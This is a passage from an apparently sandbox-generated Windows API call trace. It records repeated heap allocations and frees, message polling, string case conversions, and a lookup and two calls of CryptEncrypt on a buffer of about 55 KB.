lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0261.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.115] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0261.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0261.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0261.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0261.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0261.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0261.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0261.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0261.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24aca50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0261.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.117] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0261.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0261.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0261.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0261.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0261.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0261.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0261.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2160 | out: hHeap=0x25c0000) returned 1 [0261.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0261.118] CryptEncrypt (in: hKey=0xaa5920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xd827, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xd828) returned 1 [0261.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0261.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0261.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0261.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0261.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0261.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0261.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0261.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0261.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0261.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0261.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0261.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0261.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0261.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0261.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0261.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0261.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0261.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0261.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0261.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0261.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0261.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0261.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0261.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0261.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0261.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0261.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0261.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0261.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0261.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0261.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0261.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0261.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0261.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0261.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0261.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0261.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0261.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0261.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0261.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0261.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0261.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0261.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0261.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0261.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0261.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0261.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0261.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0261.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0261.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0261.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0261.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0261.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0261.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0261.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0261.121] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0261.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0261.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0261.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0261.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0261.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0261.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0261.121] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.122] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0261.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0261.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0261.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0261.122] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0261.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0261.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0261.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0261.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0261.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0261.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0261.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0261.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0261.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0261.122] CharLowerBuffW (in: lpsz="byte[55336]", cchLength=0xb | out: lpsz="byte[55336]") returned 0xb [0261.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0261.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0261.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0261.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0261.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0261.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0261.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0261.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0261.123] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0261.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0261.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0261.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0261.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0261.125] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0261.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0261.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0261.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0261.125] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.125] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0261.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0261.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0261.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0261.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0261.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0261.126] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.126] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.126] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0261.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0261.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0261.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0261.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0261.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0261.126] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0261.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0261.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.127] CryptEncrypt (in: hKey=0xaa5920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24e02d8*, pdwDataLen=0x8bef68*=0xd827, dwBufLen=0xd828 | out: pbData=0x24e02d8*, pdwDataLen=0x8bef68*=0xd828) returned 1 [0261.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0261.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0261.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2190 [0261.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0261.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0261.128] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0261.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0261.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0261.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0261.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0261.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0261.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0261.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0261.128] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.128] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0261.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0261.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0261.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0261.129] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0261.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0261.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0261.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0261.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0261.131] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.131] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) 